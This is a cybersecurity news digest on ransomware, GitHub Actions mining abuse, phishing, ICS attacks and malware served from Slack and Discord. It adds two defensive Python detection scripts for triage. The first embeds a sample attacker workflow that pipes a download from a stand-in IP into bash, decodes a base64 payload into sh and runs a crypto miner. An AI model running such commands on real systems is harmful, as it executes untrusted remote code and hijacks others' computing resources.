Cyber Security Headlines – Week in Review is live every Thursday at 4pm PT/7pm ET. Join us each week by registering for the open discussion.
Ransomware 2.0 is here
The availability of ransomware-as-a-service is letting more cybercriminals into the business, which now routinely includes double extortion (stealing data before encrypting it and threatening to leak it), a tactic that, according to analysis from F-Secure, increased drastically in 2020. This has driven growth in the number of ransomware families, including Ragnar Locker, DoppelPaymer, Clop, Conti, and ChaCha. Other key findings in the report: attackers are hiding malicious code in Excel formulas, a default spreadsheet feature that cannot simply be blocked; Outlook, Facebook and Office 365 were the most commonly spoofed brands in phishing emails; three-quarters of the domains used to host phishing pages were web hosting services; and email accounted for over half of all malware infection attempts in 2020, making it the most common method of spreading malware in ransomware attacks.
Malware attack is preventing car inspections in eight US states
The attack, which hit emissions testing company Applus Technologies last Tuesday, March 30, took its IT systems offline and halted vehicle inspections in eight states, including Connecticut, Georgia, Idaho, Illinois, Massachusetts, Utah, and Wisconsin. Applus Technologies cannot give a time frame for restoring service because state governments require it to complete a rigorous remediation and testing process first. The backlog may cascade into DMV inspection schedules, which in turn may lead to citations for lapsed inspections.
GitHub investigating crypto mining abuses
GitHub is actively investigating a series of attacks against its cloud infrastructure in which cybercriminals used the company's servers for illicit crypto-mining. The attacks, which have been going on since the fall of 2020, abuse GitHub Actions, a feature that automatically runs tasks and workflows when a given event happens inside a repository. The attacker forks a legitimate repository that has Actions enabled, adds a malicious workflow to the fork, and then files a Pull Request against the original repository. GitHub's systems execute the workflow supplied by the Pull Request as soon as it is filed, so the miner runs on GitHub's infrastructure without the original project owner ever approving or merging the code.
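As an added example, not code from GitHub or from any of the reporting on these attacks, the following Python triage script pulls every `run:` command out of a workflow file and flags the patterns the miner abuse relied on: a download piped straight into a shell, a base64-decoded payload, a known miner binary name, and a mining pool endpoint. The two workflow texts are constructed for the example, and the indicator list is an assumption to be tuned locally. The point it demonstrates is that the hostile logic sits in a plain-text workflow that the pull request itself supplies, so it can be inspected before any fork's workflow is allowed to run.

```python
import re

# Constructed example of a workflow an attacker might add to a fork before
# opening a pull request, modelled on the miner abuse described above.
# Not a real attacker's file; the host, payload and wallet are placeholders.
SAMPLE_WORKFLOW = """\
name: ci
on: [pull_request]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - name: tests
        run: make test
      - name: setup
        run: |
          curl -sL http://198.51.100.7/x | bash
          echo ZWNobyBoaQo= | base64 -d | sh
      - name: mine
        run: ./xmrig -o pool.example.net:3333 -u wallet
"""

# The repository's legitimate workflow, for comparison (also constructed).
BENIGN_WORKFLOW = """\
name: ci
on: [push, pull_request]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - run: make test
"""

# Indicators worth flagging in a PR-supplied workflow (constructed list; tune locally).
INDICATORS = [
    (re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|z)?sh\b"), "pipes a download straight into a shell"),
    (re.compile(r"\bbase64\b.*(-d|--decode)\b"), "decodes an embedded base64 payload"),
    (re.compile(r"\b(xmrig|minerd|cpuminer|nbminer|t-rex)\b", re.I), "known miner binary name"),
    (re.compile(r"(stratum\+tcp://|\bpool\.[\w.-]+:\d{2,5}\b)"), "mining pool endpoint"),
]

# Matches "run: <cmd>" and "- run: <cmd>"; group 1 is the key's indentation.
RUN_RE = re.compile(r"^(\s*)-?\s*run:\s*(.*)$")


def extract_run_commands(workflow_text):
    """Return [(line_no, command)] for every `run:` step, flattening block scalars.

    Deliberately small YAML subset: enough for the `run:` keys of a workflow,
    so the example needs no third-party parser.
    """
    commands = []
    lines = workflow_text.splitlines()
    i = 0
    while i < len(lines):
        m = RUN_RE.match(lines[i])
        if not m:
            i += 1
            continue
        indent, value = len(m.group(1)), m.group(2).strip()
        if value in ("|", "|-", "|+", ">", ">-", ">+"):
            # Block scalar: consume lines indented deeper than the `run:` key.
            i += 1
            while i < len(lines) and (not lines[i].strip()
                                      or len(lines[i]) - len(lines[i].lstrip()) > indent):
                if lines[i].strip():
                    commands.append((i + 1, lines[i].strip()))
                i += 1
        else:
            commands.append((i + 1, value))
            i += 1
    return commands


def scan_workflow(workflow_text):
    """Return [(line_no, reason, command)] for every indicator hit."""
    findings = []
    for line_no, cmd in extract_run_commands(workflow_text):
        for pattern, reason in INDICATORS:
            if pattern.search(cmd):
                findings.append((line_no, reason, cmd))
    return findings


def triggered_by_pull_request(workflow_text):
    """True if the workflow fires on pull_request events, the trigger the abuse relies on."""
    return re.search(r"\bpull_request(_target)?\b", workflow_text) is not None


if __name__ == "__main__":
    for name, text in (("benign", BENIGN_WORKFLOW), ("suspicious", SAMPLE_WORKFLOW)):
        print(f"{name}: pull_request trigger={triggered_by_pull_request(text)}")
        for line_no, reason, cmd in scan_workflow(text):
            print(f"  line {line_no}: {reason}: {cmd}")
```

A script like this is a triage aid, not a control: an attacker can rename a binary or fetch the payload in a second stage. The structural fix is on the repository side, requiring a maintainer to approve workflow runs from fork pull requests before they execute, which GitHub later added as a repository setting.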
Firmware malware on the rise
According to Microsoft’s March 2021 Security Signals report, over 80% of enterprises were victims of at least one firmware attack in the past two years. The survey drew responses from 1,000 companies in China, Germany, Japan, the U.K. and the U.S., who reported that the majority of their security investments were going to security updates, vulnerability scanning and advanced threat protection solutions. The report notes that NIST’s National Vulnerability Database has recorded a five-fold increase in firmware vulnerabilities over the last four years. Only 36% of businesses invest in hardware-based memory encryption and 46% in hardware-based kernel protections, while 21% of decision-makers said they were not able to monitor firmware at all. (Security Affairs)
Thanks to our episode sponsor, Sotero
LinkedIn spearphishing campaign uses custom decoy job offers
A new spear-phishing campaign is targeting LinkedIn members with customized job offers in order to deliver a sophisticated backdoor trojan called “more_eggs.” The lure is a malicious ZIP archive named after the victim’s job title as listed on their LinkedIn profile: if a member’s job is listed as Senior Account Executive—International Freight, the archive is titled Senior Account Executive—International Freight position. Opening the fake job offer silently installs the more_eggs trojan. With the COVID pandemic contributing to job losses, the phish takes advantage of job seekers who are desperate to find employment.
Ransomware attacks increased by 485% in 2020 over 2019
This data comes from Bitdefender’s 2020 Consumer Threat Landscape Report. Among the highlights: two-thirds of the ransomware attacks took place in the first two quarters of 2020. Proprietary operating systems used in IoT devices accounted for 96% of all detected vulnerabilities, and Smart TV vulnerabilities surged 335% compared to 2019. In social engineering, Android was especially heavily targeted, with a 32% growth in attacks, particularly those impersonating video conferencing software and COVID-related medical apps. In addition, vulnerabilities in network-attached storage (NAS) devices rose 189% year-on-year.
Industrial Control Systems are becoming a favorite target for threat actors
A new report from Kaspersky finds that 33.4% of Industrial Control System (ICS) computers worldwide were hit by a cyberattack in the second half of 2020. Citing two of the more prominent recent examples, the China-linked group RedEcho’s targeting of the Indian power sector and an unidentified attacker’s attempt to poison a Florida city’s water supply at its treatment plant, the report says these attacks have not just evolved but have become a “life-threatening” affair and are on an upswing, with the U.S., Canada, and Saudi Arabia experiencing the largest increases.
Microsoft reveals last week’s two-hour Azure outage was caused by DNS DDoS
Following up on a story we brought you on Monday, Microsoft has confirmed that its April 1 outage was caused by an anomalous surge of DNS queries from all over the world targeting certain domains hosted on Azure. The outage prevented users from accessing or signing into numerous Microsoft services. Microsoft did not say who was responsible for the attack, whose success was unusual against a target as large and well-defended as Azure, but explained, “In this incident, one specific sequence of events exposed a code defect in our DNS service that reduced the efficiency of our DNS Edge caches.”
Slack and Discord file sharing used to spread malware
Cisco Talos researchers report that this is an increasingly common delivery method. Threat actors upload malicious files to the collaboration platforms, which store them on their content delivery networks and hand back a shareable link. Those links are then posted on other, outside platforms, so the malware itself is served from Discord or Slack infrastructure. The researchers warn that riding on legitimate infrastructure that users already trust makes social engineering attacks much easier to pull off. Talos previously identified attackers using Discord to distribute Thanatos ransomware in 2018. Google Forms has also been seen used for phishing.
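As an added example, not code from the Talos report or from either platform, the following Python detection routine walks forward-proxy log lines and flags downloads of executable or archive files from the Discord and Slack CDN hosts the report names. The log format and every entry are constructed for the example, and the host and extension lists are assumptions to be tuned locally. Blocking the hosts outright is rarely an option where the collaboration tools are in legitimate use, which is why the check keys on the file type being fetched rather than on the host alone.

```python
import re
from urllib.parse import urlparse

# Constructed forward-proxy log lines (timestamp, client, method, URL, status).
# Not real traffic; the channel/file IDs and filenames are invented.
SAMPLE_LOG = """\
2021-04-06T14:02:11Z 10.0.4.23 GET https://cdn.discordapp.com/attachments/812345678901234567/823456789012345678/Invoice_Q1.exe 200
2021-04-06T14:02:40Z 10.0.4.23 GET https://cdn.discordapp.com/attachments/812345678901234567/823456789012345679/team_photo.png 200
2021-04-06T14:03:02Z 10.0.5.10 GET https://files.slack.com/files-pri/T0123ABCD-F0456EFGH/download/report.iso?pub_secret=abc 200
2021-04-06T14:03:15Z 10.0.5.10 GET https://files.slack.com/files-pri/T0123ABCD-F0456EFGH/download/notes.pdf 200
2021-04-06T14:04:00Z 10.0.6.77 GET https://www.example.com/index.html 200
2021-04-06T14:04:30Z 10.0.6.77 GET https://cdn.discordapp.com/attachments/1/2/setup.zip 200
this line is not a log record
"""

# Collaboration-platform CDN hosts to watch (assumed list; extend as needed).
CDN_HOSTS = {"cdn.discordapp.com", "media.discordapp.net", "files.slack.com"}

# File types that should rarely arrive from a chat attachment link (assumed list).
RISKY_EXT = {".exe", ".scr", ".dll", ".msi", ".bat", ".cmd", ".ps1", ".js", ".jse",
             ".vbs", ".hta", ".lnk", ".iso", ".img", ".zip", ".rar", ".7z"}

LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<status>\d{3})$"
)


def parse_line(line):
    """Parse one constructed log line into a dict, or return None if it does not fit."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def classify_url(url):
    """Return (host, filename, extension); the extension is lower-cased and includes the dot.

    The query string is ignored so a ?pub_secret=... suffix cannot hide the file type.
    """
    p = urlparse(url)
    filename = p.path.rsplit("/", 1)[-1]
    ext = ("." + filename.rsplit(".", 1)[-1].lower()) if "." in filename else ""
    return (p.hostname or "").lower(), filename, ext


def detect_cdn_downloads(log_text):
    """Return one hit per download of a risky file type from a watched CDN host."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        host, filename, ext = classify_url(rec["url"])
        if host in CDN_HOSTS and ext in RISKY_EXT:
            hits.append({"ts": rec["ts"], "client": rec["client"], "host": host, "file": filename})
    return hits


def hits_by_client(hits):
    """Group hits per client address so repeat downloaders stand out during triage."""
    grouped = {}
    for h in hits:
        grouped.setdefault(h["client"], []).append(h["file"])
    return grouped


if __name__ == "__main__":
    for client, files in hits_by_client(detect_cdn_downloads(SAMPLE_LOG)).items():
        print(f"{client}: {', '.join(files)}")
```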
Lockdowns saw the rise of wine scammers
A new report by Recorded Future notes that the start of COVID-19 lockdowns saw a rise in wine-related domain registrations as people increasingly turned to virtual happy hours to keep in contact with friends and co-workers, running at two to three times pre-pandemic levels from April 2020 and continuing through March 2021. Malicious domains followed a similar curve, lagging about a month behind, with a large spike in May 2020 and a total of 4,389 malicious wine-themed domains identified. Malicious wine-related domains as a share of all wine domains registered peaked in June 2020 at 7%.